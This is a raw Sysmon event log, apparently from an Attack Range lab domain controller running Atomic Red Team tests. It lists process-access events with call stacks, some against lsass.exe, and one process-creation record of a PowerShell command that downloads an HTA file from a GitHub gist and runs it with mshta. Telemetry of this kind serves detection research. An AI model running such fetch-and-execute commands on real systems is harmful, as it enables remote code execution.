15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791415Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791414Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791413Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791412Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.501{732C744F-31A3-6010-A3A2-00000000A301}64165800C:\Windows\system32\conhost.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791411Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.501{732C744F-31A3-6010-A2A2-00000000A301}7260604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FFC4AC9FC23) 10341000x8000000000000000791410Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.501{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791409Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.501{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791408Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.501{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791407Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.501{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791406Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.501{732C744F-17DF-600B-9401-00000000A301}50844708C:\Windows\system32\csrss.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000791405Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.501{732C744F-31A3-6010-A2A2-00000000A301}7260604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+3e0011(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+3e0011(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+3e0011(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+3e0011(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22070eb8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22070d2c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+220f3558|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22069914|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22b22b07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+2203210c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+220905db|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073ad1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22065a56|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+2209ebe6 154100x8000000000000000791404Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.498{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$var =Invoke-WebRequest \""https://gist.githubusercontent.com/MHaggis/a008d2d6a84fd7a28bee0135dcf28802/raw/f4750734bd61bad087b54c5a3c4fa4e6d9fd1b94/test.hta\"" $var.content|out-file \""c:\temp\test.hta\"" mshta \""c:\temp\test.hta\""} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x8000000000000000791403Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.485{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-01-26 15:16:36.298 11241100x8000000000000000791402Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.485{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-01-26 15:16:36.298 10341000x8000000000000000791664Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.766{732C744F-151A-600B-1600-00000000A301}15281680C:\Windows\system32\svchost.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791663Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.766{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791662Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791661Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791660Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791659Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791658Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791657Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791656Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791655Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791654Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791653Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791652Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791651Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791650Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791649Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 